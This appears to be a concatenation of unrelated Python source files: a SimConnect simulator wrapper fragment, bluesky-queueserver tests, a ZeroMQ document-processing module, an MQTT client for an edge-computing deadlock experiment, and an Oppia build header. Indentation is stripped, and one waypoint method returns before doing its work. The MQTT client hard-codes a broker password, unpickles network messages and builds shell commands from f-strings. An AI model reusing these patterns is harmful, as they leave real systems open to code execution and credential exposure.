self.dll.GetLastSentPacketID(self.hSimConnect, temp)
_Request.LastID = temp.value
def set_data(self, _Request):
rtype = _Request.definitions[0][1].decode()
if 'string' in rtype.lower():
pyarr = bytearray(_Request.outData)
dataarray = (ctypes.c_char * len(pyarr))(*pyarr)
else:
pyarr = list([_Request.outData])
dataarray = (ctypes.c_double * len(pyarr))(*pyarr)
pObjData = cast(
dataarray, c_void_p
)
err = self.dll.SetDataOnSimObject(
self.hSimConnect,
_Request.DATA_DEFINITION_ID.value,
SIMCONNECT_SIMOBJECT_TYPE.SIMCONNECT_SIMOBJECT_TYPE_USER,
0,
0,
sizeof(ctypes.c_double) * len(pyarr),
pObjData
)
if self.IsHR(err, 0):
# LOGGER.debug("Request Sent")
return True
else:
return False
def get_data(self, _Request):
self.request_data(_Request)
# self.run()
attemps = 0
while _Request.outData is None and attemps < _Request.attemps:
# self.run()
time.sleep(.001)
attemps += 1
if _Request.outData is None:
return False
return True
def send_event(self, evnt, data=DWORD(0)):
err = self.dll.TransmitClientEvent(
self.hSimConnect,
SIMCONNECT_OBJECT_ID_USER,
evnt.value,
data,
SIMCONNECT_GROUP_PRIORITY_HIGHEST,
DWORD(16),
)
if self.IsHR(err, 0):
# LOGGER.debug("Event Sent")
return True
else:
return False
def new_def_id(self):
_name = "Definition" + str(len(list(self.dll.DATA_DEFINITION_ID)))
names = [m.name for m in self.dll.DATA_DEFINITION_ID] + [_name]
self.dll.DATA_DEFINITION_ID = Enum(self.dll.DATA_DEFINITION_ID.__name__, names)
DEFINITION_ID = list(self.dll.DATA_DEFINITION_ID)[-1]
return DEFINITION_ID
def new_request_id(self):
name = "Request" + str(len(self.dll.DATA_REQUEST_ID))
names = [m.name for m in self.dll.DATA_REQUEST_ID] + [name]
self.dll.DATA_REQUEST_ID = Enum(self.dll.DATA_REQUEST_ID.__name__, names)
REQUEST_ID = list(self.dll.DATA_REQUEST_ID)[-1]
return REQUEST_ID
def add_waypoints(self, _waypointlist):
if self.DEFINITION_WAYPOINT is None:
self.DEFINITION_WAYPOINT = self.new_def_id()
err = self.dll.AddToDataDefinition(
self.hSimConnect,
self.DEFINITION_WAYPOINT.value,
b'AI WAYPOINT LIST',
b'number',
SIMCONNECT_DATATYPE.SIMCONNECT_DATATYPE_WAYPOINT,
0,
SIMCONNECT_UNUSED,
)
pyarr = []
for waypt in _waypointlist:
for e in waypt._fields_:
pyarr.append(getattr(waypt, e[0]))
dataarray = (ctypes.c_double * len(pyarr))(*pyarr)
pObjData = cast(
dataarray, c_void_p
)
sx = int(sizeof(ctypes.c_double) * (len(pyarr) / len(_waypointlist)))
return
hr = self.dll.SetDataOnSimObject(
self.hSimConnect,
self.DEFINITION_WAYPOINT.value,
SIMCONNECT_OBJECT_ID_USER,
0,
len(_waypointlist),
sx,
pObjData
)
if self.IsHR(err, 0):
return True
else:
return False
def set_pos(
self,
_Altitude,
_Latitude,
_Longitude,
_Airspeed,
_Pitch=0.0,
_Bank=0.0,
_Heading=0,
_OnGround=0,
):
Init = SIMCONNECT_DATA_INITPOSITION()
Init.Altitude = _Altitude
Init.Latitude = _Latitude
Init.Longitude = _Longitude
Init.Pitch = _Pitch
Init.Bank = _Bank
Init.Heading = _Heading
Init.OnGround = _OnGround
Init.Airspeed = _Airspeed
if self.DEFINITION_POS is None:
self.DEFINITION_POS = self.new_def_id("DEFINITION_POS")
err = self.dll.AddToDataDefinition(
self.hSimConnect,
self.DEFINITION_POS.value,
b'Initial Position',
b'',
SIMCONNECT_DATATYPE.SIMCONNECT_DATATYPE_INITPOSITION,
0,
SIMCONNECT_UNUSED,
)
hr = self.dll.SetDataOnSimObject(
self.hSimConnect,
self.DEFINITION_POS.value,
SIMCONNECT_OBJECT_ID_USER,
0,
0,
sizeof(Init),
pointer(Init)
)
if self.IsHR(hr, 0):
return True
else:
return False
def load_flight(self, flt_path):
hr = self.dll.FlightLoad(self.hSimConnect, flt_path.encode())
if self.IsHR(hr, 0):
return True
else:
return False
def load_flight_plan(self, pln_path):
hr = self.dll.FlightPlanLoad(self.hSimConnect, pln_path.encode())
if self.IsHR(hr, 0):
return True
else:
return False
def save_flight(self, flt_path, flt_title, flt_description):
hr = self.dll.FlightSave(self.hSimConnect, flt_path.encode(), flt_title.encode(), flt_description.encode(), 0)
if self.IsHR(hr, 0):
return True
else:
return False
def get_paused(self):
hr = self.dll.RequestSystemState(
self.hSimConnect,
self.dll.EventID.EVENT_SIM_PAUSED,
b"Sim"
)
# not working
# def dic_to_flight(self, dic):
# data_folder = os.path.dirname(os.path.realpath(__file__))
# file_to_open = os.path.join(data_folder, "TEMP.FLT")
# if os.path.isfile(file_to_open):
# os.remove(file_to_open)
# with open(file_to_open, "w") as tempfile:
# for root in dic:
# tempfile.write("\n[%s]\n" % root)
# for member in dic[root]:
# tempfile.write("%s=%s\n" % (member, dic[root][member]))
# if os.path.isfile(file_to_open):
# self.load_flight(file_to_open)
def flight_to_dic(self):
data_folder = os.path.dirname(os.path.realpath(__file__))
file_to_open = os.path.join(data_folder, "TEMP.FLT")
if os.path.isfile(file_to_open):
os.remove(file_to_open)
self.save_flight(file_to_open, "Flight", "Supper Cool flight")
while not os.path.isfile(file_to_open):
pass
time.sleep(0.5)
dic = {}
index = ""
with open(file_to_open, "r") as tempfile:
for line in tempfile.readlines():
if line[0] == '[':
index = line[1:-2]
dic[index] = {}
else:
if index != "" and line != '\n':
temp = line.split("=")
dic[index][temp[0]] = temp[1].strip()
os.remove(file_to_open)
return dic
|
test_manager_options.py
|
import pytest
import shutil
import os
import glob
import subprocess
import time as ttime
import multiprocessing
from bluesky.callbacks.zmq import RemoteDispatcher
from bluesky_queueserver.manager.profile_ops import gen_list_of_plans_and_devices
from bluesky_queueserver.manager.comms import zmq_single_request
from ._common import (
copy_default_profile_collection,
append_code_to_last_startup_file,
wait_for_condition,
condition_environment_created,
condition_queue_processing_finished,
condition_environment_closed,
)
from ._common import re_manager_cmd # noqa: F401
# User name and user group name used throughout most of the tests.
_user, _user_group = "Testing Script", "admin"
_plan1 = {"name": "count", "args": [["det1", "det2"]]}
_sample_plan1 = """
def simple_sample_plan():
'''
Simple plan for tests.
'''
yield from count([det1, det2])
"""
# fmt: off
@pytest.mark.parametrize("option", ["startup_dir", "profile", "multiple"])
# fmt: on
def test_manager_options_startup_profile(re_manager_cmd, tmp_path, monkeypatch, option): # noqa: F811
pc_path = copy_default_profile_collection(tmp_path)
# Add extra plan. The original set of startup files will not contain this plan.
append_code_to_last_startup_file(pc_path, additional_code=_sample_plan1)
# Generate the new list of allowed plans and devices and reload them
gen_list_of_plans_and_devices(startup_dir=pc_path, file_dir=pc_path, overwrite=True)
# Start manager
if option == "startup_dir":
re_manager_cmd(["--startup-dir", pc_path])
elif option == "profile":
# This option is more complicated: we want to recreate the structure of IPython startup
# directory: <some root dir>/profile_<profile_name>/startup.
root_dir = os.path.split(pc_path)[0]
monkeypatch.setenv("IPYTHONDIR", root_dir)
profile_name = "testing"
startup_path = os.path.join(root_dir, f"profile_{profile_name}", "startup")
os.makedirs(startup_path)
file_pattern = os.path.join(pc_path, "*")
for fl_path in glob.glob(file_pattern):
shutil.move(fl_path, startup_path)
os.rmdir(pc_path)
# We pass only profile name as a parameter.
re_manager_cmd(["--startup-profile", profile_name])
elif option == "multiple":
# Expected to fail if multiple options are selected.
with pytest.raises(TimeoutError, match="RE Manager failed to start"):
re_manager_cmd(["--startup-dir", pc_path, "--startup-profile", "some_name"])
return
else:
assert False, f"Unknown option '{option}'"
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
plan = {"name": "simple_sample_plan"}
params = {"plan": plan, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
monkeypatch.setenv("IPYTHONDIR", "abc")
@pytest.fixture
def zmq_proxy():
cmd = ["bluesky-0MQ-proxy", "5567", "5568"]
p = subprocess.Popen(cmd, universal_newlines=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
yield
p.kill()
@pytest.fixture
def zmq_dispatcher():
# The following code was mostly borrowed from 'bluesky.tests.test_zmq.py' (test_zmq_no_RE)
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print("putting ", name, "in queue")
queue.put((name, doc))
d = RemoteDispatcher("127.0.0.1:5568")
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher, daemon=True, args=(queue,))
dispatcher_proc.start()
ttime.sleep(2) # As above, give this plenty of time to start.
yield queue
dispatcher_proc.terminate()
dispatcher_proc.join()
def test_manager_acq_with_0MQ_proxy(re_manager_cmd, zmq_proxy, zmq_dispatcher): # noqa: F811
re_manager_cmd(["--zmq-data-proxy-addr", "localhost:5567"])
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
params = {"plan": _plan1, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
# Test if the data was delivered to the consumer.
# Simple test: check if 'start' and 'stop' documents were delivered.
queue = zmq_dispatcher
remote_accumulator = []
while not queue.empty(): # Since queue is used by one process at a time, queue.empty() should work reliably
remote_accumulator.append(queue.get(timeout=2))
assert len(remote_accumulator) >= 2
assert remote_accumulator[0][0] == "start" # Start document
assert remote_accumulator[-1][0] == "stop" # Stop document
|
processing.py
|
# vim: set et nosi ai ts=2 sts=2 sw=2:
# coding: utf-8
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import io
import sys
import threading
from schwa.dr import Reader, Writer
from six.moves import xrange
try:
import zmq
except ImportError:
zmq = None
def stream_coroutine(istream, ostream, doc_class=None, automagic=False):
reader = Reader(istream, doc_class, automagic)
writer = Writer(ostream, reader.doc_schema)
for doc in reader:
res = yield(doc)
writer.write(res or doc)
def zmq_coroutine(context, dealer_url, doc_class=None, automagic=False):
# FIXME: reduce overhead of reader/writer creation
ostream = io.BytesIO()
socket = context.socket(zmq.REP)
socket.connect(dealer_url)
while True:
msg = socket.recv()
istream = io.BytesIO(msg)
istream.seek(0)
reader = Reader(istream, doc_class, automagic)
writer = Writer(ostream, reader.doc_schema)
for doc in reader:
res = yield(doc)
writer.write(res or doc)
ostream.seek(0)
socket.send(ostream.getvalue())
ostream.truncate(0)
arg_parser = argparse.ArgumentParser(add_help=False)
if zmq:
_megroup = arg_parser.add_mutually_exclusive_group()
_megroup.add_argument('--serve', dest='serve_url', metavar='ADDRESS', default=None, help='Serve from the specified address, e.g. tcp://*:7300')
_megroup.add_argument('--worker', dest='worker_url', metavar='ADDRESS', default=None, help='Acquire work from the specified address')
arg_parser.add_argument('--nthreads', default=1, type=int, help='In --serve or --worker mode, how many worker threads to provide (default: %(default)s)')
def run_processor(process, args, doc_class=None, automagic=False, dealer_url='inproc://workers'):
if any(getattr(args, a, None) for a in ('serve_url', 'worker_url')):
context = zmq.Context(1)
if args.serve_url:
clients = context.socket(zmq.ROUTER)
clients.bind(args.serve_url)
workers = context.socket(zmq.DEALER)
workers.bind(dealer_url)
else:
dealer_url = args.worker_url
run = lambda: process(zmq_coroutine(context, dealer_url, doc_class, automagic))
threads = [threading.Thread(target=run) for i in xrange(args.nthreads)]
for thread in threads:
thread.start()
if args.serve_url:
zmq.device(zmq.QUEUE, clients, workers)
else:
process(stream_coroutine(sys.stdin, sys.stdout, doc_class, automagic))
|
client_agent.py
|
#!/usr/bin/env python3
import matplotlib
import socket
import os
import ast
import struct
import random as r
import time
import datetime as dt
import subprocess as sp
import paho.mqtt.client as mqtt
import matplotlib.pyplot as plt
from drawnow import *
import smtplib
import config
import pickle
import algorithms.data_homo as homo
import algorithms.data_hetero as hetero
from threading import Thread
import threading
matplotlib.use('TkAgg')
port = 65000 # The port used by the server
shared_resource_lock = threading.Lock()
# hosts = {} # {hostname: ip}
multicast_group = '224.3.29.71'
server_address = ('', 10000)
record = [] # [({tasks}, {waiting time}), hostname] records the task list and execution and waiting time and host sent
run = 1
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multi-cast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
'''
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
'''
thread_record = []
task_record = {} # records tasks start time and finish time {seq_no:{task:[duration, start_time,finish_time]}}
# idea for task naming # client-id_task-no_task-id client id = 11, task no=> sequence no, task id => t1
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local': 0, 'mec': 0, 'cloud': 0}
untimely_ = {'local': 0, 'mec': 0, 'cloud': 0}
filename = {2: 'rms+bankers',
3: 'edf+bankers',
7: 'rms+wound_wait',
10: 'rms+wait_die',
12: 'edf+wound_wait',
16: 'edf+wait_die'}
plt.ion()
fig = plt.figure(frameon=True)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(223)
ax3 = fig.add_subplot(224)
def auto_value(no):
if no < 5:
return no
elif no < 10:
return no - 3
elif no < 50:
return no - 6
elif no < 150:
return no - 30
elif no < 800:
return no - 70
elif no < 2000:
return no - 200
else:
return no - 400
def plot_performance():
name = ['Timely', 'Untimely']
ypos = ([0, 1])
total = tasks_executed_on_time + tasks_not_executed_on_time
if tasks_executed_on_time > 0:
timely = round((tasks_executed_on_time / total) * 100, 2)
else:
timely = 0
if tasks_not_executed_on_time > 0:
untimely = round((tasks_not_executed_on_time / total) * 100, 2)
else:
untimely = 0
values = [tasks_executed_on_time, tasks_not_executed_on_time]
ax1.set_xticks(ypos)
ax1.set_xticklabels(name)
ax1.bar(ypos, values, align='center', color=['g', 'm'], alpha=0.5)
ax1.set_title('Task execution Time record')
dis = 'Seq: {}\nTotal Tasks: {}\ntotal: {}'.format(seq, total, total_split_task)
# ax1.annotate(dis, xy=(2, 1), xytext=(3, 1.5))
ax1.text(1, auto_value(tasks_executed_on_time), dis, size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.7, 0.7), fc=(1., 0.8, 0.8), ))
ax1.text(-0.1, tasks_executed_on_time, '{}, {}%'.format(tasks_executed_on_time, timely), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
ax1.text(0.99, tasks_not_executed_on_time, '{}, {}%'.format(tasks_not_executed_on_time, untimely),
size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
plt.subplot(ax1)
d = [[timely_, ax2, 'Timely Details'], [untimely_, ax3, 'UnTimely Details']]
for info in d:
plot_details(ax=info[1], data=info[0], title=info[2])
fig.suptitle('MEC Performance During Deadlock Experiment')
def plot_details(ax, data, title):
name = ['Local', 'MEC', 'Cloud']
ypos = ([0, 1, 2])
data_per = {}
total = 0
for i in data:
total += data[i]
for i in data:
if data[i] == 0:
data_per[i] = 0
else:
data_per[i] = round((data[i] / total) * 100, 2)
values = list(data.values())
ax.set_xticks(ypos)
ax.set_xticklabels(name)
ax.bar(ypos, values, align='center', color=['g', 'b', 'r'], alpha=0.5)
ax.set_title(title)
g = -0.1
for i in data:
ax.text(g, data[i], '{}, {}%'.format(data[i], data_per[i]), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
g += 1
plt.subplot(ax)
def get_time():
_time_ = dt.datetime.utcnow()
return _time_
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect_task(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(task_topic, qos=0)
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
# Callback Function on Receiving the Subscribed Topic/Message
def on_receive_task(message_client, userdata, msg):
global tasks_executed_on_time
global tasks_not_executed_on_time
# print the message received from the subscribed topic
data = str(msg.payload, 'utf-8')
received_task = ast.literal_eval(data) # {task_id: ['2020', '04', '09', '14', '38', '39', '627060', '<mec>']}
for i in received_task:
tk = '.'.join(i.split('.')[:4])
# print('tk: {}'.format(tk))
seq_no = int(tk.split('.')[3]) # naming tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
k = task_record[seq_no][tk] # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
if len(k) < 3: # check if i have received a task with the same id
a = received_task[i]
k.append(dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6])))
p = k[2] - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
elif len(k) == 3:
a = received_task[i]
t = dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6]))
p = t - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
def receive_mec_start(stop):
global task_topic
global task_client
username = 'mec'
password = 'password'
broker_port_no = 1883
task_topic = client_id(ip_address())
task_client = mqtt.Client()
task_client.on_connect = on_connect_task
task_client.on_message = on_receive_task
task_client.username_pw_set(username, password)
task_client.connect(broker_ip, broker_port_no, 60)
task_client.loop_start()
while True:
if stop():
task_client.loop_stop()
task_client.disconnect()
break
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results {} {} {}'.format(filename[algo_id], get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def client_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def task_details(tasks):
global task_dist, total_task_sent, total_split_task
total_task_sent += len(tasks)
for task in tasks:
total_split_task += tasks[task]['wcet']
task_dist[tasks[task]['wcet']] += 1
def name_task(task_list, node_id, seq_no):
# naming nomenclature of tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
# returns task list and waiting_time with proper identification
return {i + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[0][i] for i in task_list[0]}, \
{k + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[1][k] for k in task_list[1]}
def namestr(obj):
namespace = globals()
return [name for name in namespace if namespace[name] is obj]
def split_list(data, _id_):
if _id_ == 4: # 866
return data[:866]
if _id_ == 5: # 867
return data[866:1733]
if _id_ == 6: # 867
return data[1733:]
def save_data(send_path):
result = f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} " \
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}" \
f"\nrecord{len(hosts)} = {record} \nhost_names{len(hosts)} = {host_dict}" \
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}" \
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = " \
f"{total_split_task} " \
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n" \
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}" \
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}" \
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}" \
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
list_result = [
f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} ",
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}",
f"\nrecord{len(hosts)} = {record} ",
f"\nhost_names{len(hosts)} = {host_dict}",
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}"
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = "
f"{total_split_task} "
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n",
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}",
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}",
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}",
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
file_ = open(f'{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py'
os.system(cmd)
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py",
f"mec@{ho['osboxes-0']}:{send_path}"])
send_email(result, send_path)
def run_me(mec_dict, algo_id_, exp_kind, send_path): # get_mec_details(mec_dict, algo_id_) homo/hetero
global record
global client_id_
global seq
global run
global plot
os.system('clear')
print("================== Welcome to Client Platform ===================")
get_mec_details(mec_dict=mec_dict, algo_id_=algo_id_) # get_mec_details(mec_dict, algo_id_)
client_id_ = client_id(ip_address())
stop = False
redeem_task = Thread(target=receive_mec_start, args=(lambda: stop,))
redeem_task.daemon = True
redeem_task.start()
exp_type = {'homo': homo, 'hetero': hetero}
dst = exp_type[exp_kind]
print('Client is connected to servers: {}'.format(hosts))
data = {4: dst.mec4, 7: dst.mec7, 10: dst.mec10}
task_bank = {4: dst.data_list4, 5: dst.data_list5, 6: dst.data_list6}
cmd = ['hostname']
host_id = str(sp.check_output(cmd, shell=True), 'utf-8')[-2]
t_list = task_bank[int(host_id)]
print('experiment started!')
_data_ = split_list(data[len(hosts)], int(host_id))
for i in range(len(_data_)):
seq = i
rand_host = hosts[int(_data_[i]) - 1] # host selection using generated gausian distribution
_task_ = t_list[i] # tasks, waiting time
_tasks_list = name_task(_task_, client_id(rand_host), i) # id's tasks => ({tasks}, {waiting time})
task_details(_tasks_list[0])
record.append([_tasks_list, host_dict[rand_host]])
for task in _tasks_list[0]:
sec = dt.timedelta(seconds=_task_[1][task[:2]][1])
if i not in task_record: # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
task_record[i] = {task: [sec, get_time()]}
else:
task_record[i][task] = [sec, get_time()]
# client(_tasks_list, rand_host)
task_client.publish(client_id(rand_host), "t {}".format(_tasks_list))
print("Sent {} to {} node_id {} \n\n".format(_tasks_list, rand_host, client_id(rand_host)))
shared_resource_lock.acquire()
plot = 1
shared_resource_lock.release()
time.sleep(3)
time.sleep(r.uniform(0,30))
# messenger.publish(topic=control_topic, data=pickle.dumps(['client finish', host_id]))
task_client.publish('control/control', pickle.dumps(['client finish', host_id]))
print('Client Finished')
while True:
if run == 0:
print('\nProgramme terminated')
print('MEC: ', ho['osboxes-0'])
save_data(send_path=send_path)
time.sleep(1)
break
run = 1
refresh()
class BrokerCom:
def __init__(self, user, pw, ip, sub_topic):
self.user = user
self.pw = pw
self.ip = ip
self.port = 1883
self.topic = sub_topic
self.client = mqtt.Client()
self.run = 1
def on_connect(self, connect_client, userdata, flags, rc):
print("Connected with Code :" + str(rc))
# Subscribe Topic from here
connect_client.subscribe(self.topic)
def on_message(self, message_client, userdata, msg):
global run
print(f'Topic received: {msg.topic}')
data = pickle.loads(msg.payload) #
if data[0] == 'start': # ['start', {hostname: ip}, algo_id, homo/hetero, send_path]
# get_mec_details(mec_dict, algo_id_) homo/hetero (mec_dict, algo_id_, exp_kind)
run_me(mec_dict=data[1], algo_id_=data[2], exp_kind=data[3], send_path=data[4])
elif data[0] == 'stop': # ['stop']
run = 0
def publish(self, topic, data):
self.client.publish(topic, data)
def broker_loop(self):
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.username_pw_set(self.user, self.pw)
self.client.connect(self.ip, self.port, 60)
self.client.loop_start()
while True:
if self.run == 0:
self.client.loop_stop()
self.client.disconnect()
break
def __del__(self):
print('Broker Communication Object Deleted!')
def refresh():
global record, task_dist, task_record, tasks_executed_on_time, tasks_not_executed_on_time, timely_, untimely_
global u_time, t_time, total_split_task, total_task_sent
record = []
task_record = {}
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local': 0, 'mec': 0, 'cloud': 0}
untimely_ = {'local': 0, 'mec': 0, 'cloud': 0}
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def get_mec_details(mec_dict, algo_id_):
global hosts
global host_dict
global algo_id
global ho
ho = mec_dict # {hostname: ip}
algo_id = algo_id_
hosts = sorted(list(ho.values())) # list of Ips
host_dict = dict(zip(list(ho.values()), list(ho.keys()))) # {ip: hostname}
plot = 0
def starter():
global broker_ip
global messenger
global control_topic
global plot
control_topic = 'control/control'
broker_ip = '192.168.122.111'
broker_dict = {'user': 'mec', 'pw': 'password', 'ip': broker_ip,
'sub_topic': 'control/client'}
messenger = BrokerCom(**broker_dict)
h1 = Thread(target=messenger.broker_loop)
h1.daemon = True
h1.start()
while True:
if plot == 1:
drawnow(plot_performance)
shared_resource_lock.acquire()
plot = 0
shared_resource_lock.release()
time.sleep(3)
if __name__ == "__main__":
os.system('clear')
starter()
|
build.py
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
